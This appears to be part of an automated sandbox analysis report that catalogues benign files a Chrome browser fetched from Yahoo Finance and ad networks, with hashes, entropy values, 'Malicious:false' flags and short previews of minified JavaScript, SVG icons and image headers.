                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.245192339796388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:KhmEpqLt1QiMW3oWzRiad9UHVU3vMIMceTS2zJ8tYqYfJii9STxoI4hEy84IVvn:pEs1Q9yBliocV33bTuVikNwwVvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EBC1FF8FB4A187073CB7ED5389CFC775
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0F76E27417481C05C89B82E39D5B488CA6FCF40B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:43F204B7EC61316419D65D4326C38037B157A63998EADADAE235EBEBA291E629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1DFF6A835EBCC0806E6EA3CD631D0683545DFC7A353D1885140F0DAB9E23B106262D646E83E3C38124D1AC4171D8AAC50D02BFEA018DD85FFC4843F969779592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as c}from"./scheduler.Dsuh-FKt.js";import{S as s,i as m,c as f,b as p,m as u,t as _,a as l,d as g}from"./index.CvwOawEI.js";import{T as k,L as b,F as i}from"./twitter-x-round.YxAnOas2.js";import{I}from"./Icon.C8w5V9EK.js";function d(a){let n,e;return n=new I({props:{icon:a[0],size:"xx-large",type:"primary"}}),{c(){f(n.$$.fragment)},l(t){p(n.$$.fragment,t)},m(t,o){u(n,t,o),e=!0},p(t,[o]){const r={};o&1&&(r.icon=t[0]),n.$set(r)},i(t){e||(_(n.$$.fragment,t),e=!0)},o(t){l(n.$$.fragment,t),e=!1},d(t){g(n,t)}}}function w(a,n,e){let{variant:t}=n,o=i;return a.$$set=r=>{"variant"in r&&e(1,t=r.variant)},a.$$.update=()=>{if(a.$$.dirty&2)switch(t){case"facebook":e(0,o=i);break;case"linkedin":e(0,o=b);break;case"twitter":e(0,o=k);break}},[o,t]}class $ extends s{constructor(n){super(),m(this,n,w,d,c,{variant:1})}}export{$ as S};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1562), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1562
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.514435553376286
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:jv1Jb3/MoVTSeAdPMNMqjVUaseOSCy9AHVGBjMdgX0Bw1kmld:jt53kuAUiqjuasedCKAHVGaa0Bcd3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3AFB78B9837DEB7398D9BE02598FA774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9EDC8D4DEB4C6B217697D5A6098B3C2BAEE4E3A6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:409E779D30BE7D755CFFD5AD357C9BFD71FF867CB35A8A8816B52A75994A2FE7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:59D951F4F216050B470E980E48EF0FA49EFAB521628499EC2D5D1E1BD52EA22CB3918E1E386D743A7E2A168DE8E98D0D4D1FA9081C4D1E94BD6D6D9BD0DA0E43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=54374054&p=133799&s=0&a=0&ptask=ALL&np=0&fp=0&rp=1&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:PubMatic.loadAsyncIframePixel('https://cms.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?idmatch=0&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://pixel-sync.sitescout.com/dmp/pixelSync?nid=3&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://x.bidswitch.net/sync?ssp=pubmatic&gdpr=0&gdpr_consent=&us_privacy=#US_PRIVACY');PubMatic.loadAsyncImagePixel('https://pubmatic-match.dotomi.com/match/bounce/current?networkId=17100&version=1&nuid=176682A8-E121-44A7-818D-4FE53D542BB2&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync.srv.stackadapt.com/sync?nid=11&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://dsp-ap.eskimi.com/pixelGet?ex=50&gdpr={gdpr}&gdpr_consent={gdpr_consent}&dest=https://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM3MDcmdGw9MjAxNjA=&piggybackCookie={dmp_id}&gdpr={gdpr}&gdpr_consent={gdpr_consent}');PubMatic.loadAsyncIframePixel('https://p.rfihub.com/cm?pub=224&in=1&getuid=https%3A//image2.pubmatic.com/AdServe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (11269)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11270
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.570460312881188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:81LxhOR9lvNctbaZ7r02+oMcECny6ne117eaju4O2HwI6ze8X+QInuS6WyMP/1BU:81LxhOR9lw2+oM9DT117eyLBb8P/oiqm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7082E09CBEB8CF39B0CE52DC40AA31C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:467F22AA09E29638F679BAF00FC23892196CE2F4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B296E7198E18A7E222B7F974237100E32A9438D9D68A1D23C8569CDF58142EB6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:512EC5097B2A0D630E8A1F566489FD5C0F66B53C8456ABA75E61520417E7CE22B29D1AA88326AF9E11351C9A63E894D6B9AB28F1EE3D0C670EE9B47E37036C44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/PerformanceOverview.Bekft1HU.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as he,p as B,k,i as d,e as S,b as D,d as U,f as Y,j as L,q as w,O as A,L as ne,l as v,t as C,h as I,m as P,n as ae,K as se}from"./scheduler.Dsuh-FKt.js";import{S as de,i as pe,t as g,g as H,a as M,e as Q,c as J,b as Z,m as $,d as x}from"./index.CvwOawEI.js";import{e as re,u as Ee,o as ve}from"./each.CI2tb2RB.js";import{t as R,n as K,N as G,b as j}from"./commonUtil.BWwawKjd.js";import{C as be}from"./Card.B4O9y5RB.js";import{L as ge}from"./Link.vSNQugO0.js";import{S as ke}from"./SectionFooter.xjeo4TXG.js";import{S as ye}from"./SectionHeader.NLJaoS9L.js";import{e as Te}from"./quoteUtil.C6mXO8A-.js";function ie(a,t,l){var c,u,N,y;const e=a.slice();e[23]=t[l];const n=(u=(c=e[7])==null?void 0:c[e[23]])==null?void 0:u.raw;e[24]=n;const s=e[24]>=0?"positive":"negative";e[25]=s;const i=(y=(N=e[11])==null?void 0:N[e[23]])==null?void 0:y.raw;e[26]=i;const o=e[26]>=0?"positive":"negative";e[27]=o;const r=e[5]?e[5]==="sector"?R("SECTOR",{ns:e[0]}):R("INDUSTRY",{ns:e[0]}):e[13];return e[28]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:C source, ASCII text, with very long lines (30726), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):30726
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.391815082267386
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:dUqVH4yHoIWXonTpBcEcuPIFw5r+zcxKwMg:uOH4ApBcEci+w9+zcxKwMg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F9F58BC68B0545C4ABA1ABC664A22B74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F4C51D449BF10280A6E13BBF1C39B28E5316BE84
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1E7ADC9A24A57746863EF54F2DE5F8905C242EBC6D416713133FF989FB050222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:856AB15C1FC66B50F4955C0611D688A13DB3BC95FBBB8A0A86449B7B61A971AFF610BC193B6073A7F09756F2C030EE7BA2CB854778C529F9E3E2923FA8B2CC19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ads.rubiconproject.com/ad/17250.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var SchainValidator={validateSchainString:function(n){if(!n||"string"!=typeof n)return!1;if(/\s/.test(n))return console.warn("Invalid schain: String cannot contain spaces"),!1;var e=n.split("!"),a=e.length;if(a<2)return console.warn("Invalid schain: Contains 0 nodes"),!1;for(var i,t=!0,r=0;r<a&&t;r++)var o=e[r].split(","),t=0===r?2===(i=o).length&&i[0]&&i[1]?/^\d+\.\d+$/.test(i[0])?0==i[1]||1==i[1]||(console.warn("Invalid schain: complete flag must be either 0 or 1"),!1):(console.warn("Invalid schain: version must be in the format <major>.<minor>"),!1):(console.warn("Invalid schain: There must be exactly 2 properties before 1st node: version and complete flag"),!1):function(n,e){if(n.length<3||!n[0]||!n[1]||!n[2]){console.warn("Invalid schain: Schain node "+e+" does not have the minimum number of properties. asi, sid, and hp are required");return false}if(n[0].startsWith("http:")||n[0].indexOf("/")>-1){console.warn("Invalid schain: Schain node "+e+" asi should be the canonical domain n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1399)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.306127713287615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:WQlTXgGRt+OECsFcWGFt2xgmTAUccKVLLTjA4Jr22ddOBAzAjMP+1F:WQOUtHtsrGDtmTHcXLTs4J338jMW7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:578A2D4F035918E93F4F2A3F13442FF1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5322166ADAF9F2D12AF71CEB7408BEB414605E15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B6BD8A2C161FD2CBA2C62E0C1282DE2FC5FCD9A7EA505372F34176FB9755C361
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C14C488A47C23B4E9406B9B3DB8911A146388E727C5D88A7BF044931148759C764DD95190532ABFBFCD9418BF804E05D53E8D57E5D37497349E1C37D69793291
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as z,p as _,k as v,n as u,i as m,_ as d,A as o,W as b,e as N,H as k,d as H,f as I,z as p,B as g,L as h}from"./scheduler.Dsuh-FKt.js";import{g as S}from"./spread.CgU5AtxT.js";import{S as q,i as A}from"./index.CvwOawEI.js";function y(a){let e,s,i,l=[{class:i=`icon fin-icon ${a[3]}-icn sz-${a[2]} ${a[0]}`},a[4]],c={};for(let t=0;t<l.length;t+=1)c=o(c,l[t]);return{c(){e=N("div"),s=new k(!1),this.h()},l(t){e=H(t,"DIV",{class:!0});var n=I(e);s=p(n,!1),n.forEach(m),this.h()},h(){s.a=null,g(e,c),h(e,"yf-7v4gbg",!0)},m(t,n){v(t,e,n),s.m(a[1],e)},p(t,n){n&2&&s.p(t[1]),g(e,c=S(l,[n&13&&i!==(i=`icon fin-icon ${t[3]}-icn sz-${t[2]} ${t[0]}`)&&{class:i},n&16&&t[4]])),h(e,"yf-7v4gbg",!0)},d(t){t&&m(e)}}}function B(a){let e,s=typeof a[1]=="string"&&y(a);return{c(){s&&s.c(),e=_()},l(i){s&&s.l(i),e=_()},m(i,l){s&&s.m(i,l),v(i,e,l)},p(i,[l]){typeof i[1]=="string"?s?s.p(i,l):(s=y(i),s.c(),s.m(e.parentNode,e)):s&&(s.d(1),s=null)},i:u,o:u,d(i){i&&m(e),s&&s.d(i)}}}function C(a,e,s){const i=["classNa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (12779)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.52232740317644
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:qquREsbtWspLqoLVqfsepofQF//isyQNu10Vp2Uh2aJBKMdxhNn:Gxr5fxyCQBHypQp3oU4UzN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4DFDB5CB9EF41F7E8D4B10791DC8812D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:40B410CA640EB32871709DF023CEFF32120DA0A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9C1FC1A718A819DD2476D3C43C7DBEF175DCF2C4770A5EB7C439FF74171F01FD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3FACAA72A347EEDBCDD45530CB2C5C496C4257E6EA226700FB7EAD9EAEB76A301CF5777BBA0FEC0E86CC95D0353E782EE0E763B1C399E2F663FA5038CAFCEE0D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Select.DMUNtRO-.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as Ee,c as He,A as q,e as G,b as K,d as W,f as O,j as P,i as I,B as Se,L as S,k as R,l as D,u as Re,g as Be,a as De,_ as J,W as Ue,q as N,O as U,G as Ce,v as Ye,I as Ze,Q as Ne,t as we,p as ke,h as xe,m as pe,C as ze}from"./scheduler.Dsuh-FKt.js";import{S as Ge,i as We,t as _,g as qe,a as M,e as Te,c as ee,b as te,m as le,d as ie}from"./index.CvwOawEI.js";import{g as Oe,a as Ie}from"./spread.CgU5AtxT.js";import{C as $e}from"./check.21reEWCG.js";import{I as Ke}from"./Icon.C8w5V9EK.js";import{A as et}from"./a11y-dialog.esm.BnYZCIGX.js";import{B as tt}from"./Button.C2rixdaC.js";import{C as _e}from"./expand_more.DscV4c36.js";import{b as Le}from"./i13nUtil.8E8_gCdn.js";import{T as lt}from"./commonUtil.BWwawKjd.js";import{a as it}from"./43.BgWy8GOF.js";function Ve(i){let e,l;return e=new Ke({props:{icon:$e,className:"check",size:i[6],type:"action"}}),{c(){ee(e.$$.fragment)},l(a){te(e.$$.fragment,a)},m(a,u){le(e,a,u),l=!0},p(a,u){const c={};u&64&&(c.size=a[6]),e.$set(c)},i(a){l||(_(e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.883606614609165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHTmHGFVcVwRuVuVqR2VQcsHASAdSbFy:H69mc4sl3O4ThVcVwRaaprsgx7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:827368291B41497FE4F55F2E33E2119B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9CAD22C912012194A12CF8B5B74C1568549FF5DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4A886A2D2445C248984DAF4CD9789ABF3F8EADFDA69C3CA08DA1FFDB24F10027
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7C207ECD4A50A48A1F0A98E94DAE3A68B4A7AB1884A194C631C167036C6BC1ADC7B344B86BE9DB444E9B59D2DC6DA8734CEDAED4A96E9B356A0407B7EC636316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/circle.D08G6-cW.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 2C6.47 2 2 6.47 2 12s4.47 10 10 10 10-4.47 10-10S17.53 2 12 2"/></svg>';export{s as c};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:C++ source, ASCII text, with very long lines (335)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.701410411486409
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:ySXE0HajRBeFZVKZIJFMrESDMXPJdMJ8CrGmpbkPRVYBNZyFCF2zvn:XXE0HyRBe5sjE8MXsJ8CK8bkrmUGWvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:42E6A599D599E2C94EFB45DC3736636C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7757F8535A81F05A9C9EC40822EAFBB455408566
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C086EF0BCA9C11B161E96BB18BAB524FF65E9EC9B8DE64CC5CB615E070A81A32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:918EF6A5ABC1B168F56AA77BA34A8B681C6C22E3BE1C3A4957A6851BFAF7FC842A1C4F8936AED0FF60E01F500F09E4A56676517B1E43B4C993552D9E1A9829DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:class i{constructor(t,s){this.status=t,typeof s=="string"?this.body={message:s}:s?this.body=s:this.body={message:`Error: ${t}`}}toString(){return JSON.stringify(this.body)}}class o{constructor(t,s){this.status=t,this.location=s}}class a extends Error{constructor(t,s,e){super(e),this.status=t,this.text=s}}export{i as H,o as R,a as S};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1308)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1309
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.04998942349745
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:q1GtZcefjJR94XPMbq51Q1FPrl/fTqRZ7sCtwohVpWjRXHKycvn:yG5rJ4hDklLgsArXW9XHXcvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4354A9DD51B6388DB42CC727D8C12B14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2AE13E9A82AA3F90C6A30282D2B7106FD56F640C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7F8A1F695701338EC89F58773C2E0D986A47D6AEA3DE0CCE8D72BCACFCF192C2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0BF433F14FECCA7C1200463696F9158DFCC89C60887FD60291C1268699EE584838777C59AD16E9B97ADC1557FDD8FB27C5B001BACEE569AD56CDFD07A63F9BB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/settings.Cb3KIuwM.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const c='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19.43 12.98c.04-.32.07-.64.07-.98s-.03-.66-.07-.98l2.11-1.65c.19-.15.24-.42.12-.64l-2-3.46a.5.5 0 0 0-.61-.22l-2.49 1c-.52-.4-1.08-.73-1.69-.98l-.38-2.65A.49.49 0 0 0 14 2h-4c-.25 0-.46.18-.49.42l-.38 2.65c-.61.25-1.17.59-1.69.98l-2.49-1a.6.6 0 0 0-.18-.03c-.17 0-.34.09-.43.25l-2 3.46c-.13.22-.07.49.12.64l2.11 1.65c-.04.32-.07.65-.07.98s.03.66.07.98l-2.11 1.65c-.19.15-.24.42-.12.64l2 3.46a.5.5 0 0 0 .61.22l2.49-1c.52.4 1.08.73 1.69.98l.38 2.65c.03.24.24.42.49.42h4c.25 0 .46-.18.49-.42l.38-2.65c.61-.25 1.17-.59 1.69-.98l2.49 1q.09.03.18.03c.17 0 .34-.09.43-.25l2-3.46c.12-.22.07-.49-.12-.64zm-1.98-1.71c.04.31.05.52.05.73s-.02.43-.05.73l-.14 1.13.89.7 1.08.84-.7 1.21-1.27-.51-1.04-.42-.9.68c-.43.32-.84.56-1.25.73l-1.06.43-.16 1.13-.2 1.35h-1.4l-.19-1.35-.16-1.13-1.06-.43c-.43-.18-.83-.41-1.23-.71l-.91-.7-1.06.43-1.27.51-.7-1.21 1.08-.84.89-.7-.14-1.13c-.03-.31-.05-.54-.05-.74s.02-.43.05-.73l.14-1.13-.89-.7-1.08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (24850)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):24944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.116910413083682
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:+O+ngXh3faH86i0BJYCw2M8h0ZR00TBiltM2kHjom:+Ovh3fg80BJMP700TBcH4om
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6281FC8E8ABCB1CF0C0D27AC1908296C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E7218D509EE07278307EEE86CB34F90529BD16E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:06E57D9B9A4B74DDD435E49C6B2C4FD1F29A39535414F7A54CFF1C0CEBE2AD15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3921320F36A3C9777FE7BC77FAB7CF056181283B2BBF03BB1E2104CFE749746A1217DAC11C8016742FFF3AB0296DB23BC773387281596586A1CA0E588A7EE30B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/common-3e9593a4.2848328177992930197b.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-3e9593a4.2848328177992930197b.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[3888],{2403:(t,e,i)=>{var s=i(4603);(t=>{var e=void 0!==s.mE?s.mE:t.CIQ,i=void 0!==s.vn?s.vn:t.timezoneJS,n=36e5,r=864e5,a=e.Market;e.Market=function(t){this.market_def=!1,this.rules=!1,this.normalHours=[],this.extraHours=[],this.class_name="Market",i.Date?this.tz_lib=i.Date:this.tz_lib=Date,this.market_tz="",this.hour_aligned=!1,this.convertOnDaily=!1,this.enabled_by_default=!1,void 0!==t&&t&&!e.isEmpty(t)?(t.market_definition&&(t=t.market_definition),t.rules&&(this.rules=t.rules),t.market_tz&&(this.market_tz=t.market_tz),t.convertOnDaily&&(this.convertOnDaily=t.convertOnDaily),t.hour_aligned,this.hour_aligned=t.hour_aligned,void 0!==t.beginningDayOfWeek&&(this.beginningDayOfWeek=t.beginningDayOfWeek),void 0!==t.minimum_session_length&&(this.minimumSessionLength=t.minimum_session_length),void
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):9088
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.530935263226097
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:KsvynUKUv/UCMrYNMtKwQ15fJmDRTNo2GNPav4mGfAm:K6npvsCMrYNg7Y5hIeyAKm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:984BE9B90DAEB72D7F404AED0569DBC6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2A58FBAF59199F48BF3850F8DE601E00CE4BAE73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6293C8961ADB2479946A1F7B7505A858663F5342E71B52F75AFD7077F0657BCC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:33F1ADE1163EA06506A3C851ED1D2D79DCC47578CD1FFD8115B2BEAE1AB6AA8232D751C3AD096445F1098CADB926ECE10977DC69DDF086C63DC99CA7A623CEDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uu/api/res/1.2/Wzs19jFHdMDc_wAXtX4KnQ--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-09/7e34b8e0-7778-11ef-b5fd-d718d88a3d1b.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFFx#..WEBPVP8X.... ...+.....ICCP........appl....mntrRGB XYZ .........(.,acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt...P...#wtpt...t....rXYZ........gXYZ........bXYZ........rTRC........aarg....... vcgt.......0ndin... ...>mmod...`...(vcgp.......8bTRC........gTRC........aabg....... aagg....... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ.......0daDK.......FnlNL.......bfiFI.......xitIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW.......$viVN........skSK.......<zhCN.......$ruRU...$...RenGB.......vfrFR........ms..........hiIN........thTH........caES........enAU.......vesXL........deDE........enUS........ptBR........plPL......."elGR..."...4svSE.......VtrTR.......fptPT.......zjaJP.........L.C.D. .u. .b.o.j.i.... .L.C.D.F.a.r.g.e.-.L.C.D.L.C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 12 x 12, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):254
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.862340972505271
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:6v/lhPbnUgnPV/81FnNN+naMwy9CG5s/O65IP20OGtWJPjQVXV8up:6v/7Tvn9oFQaMTCG5sWhP20OGtOPcd2c
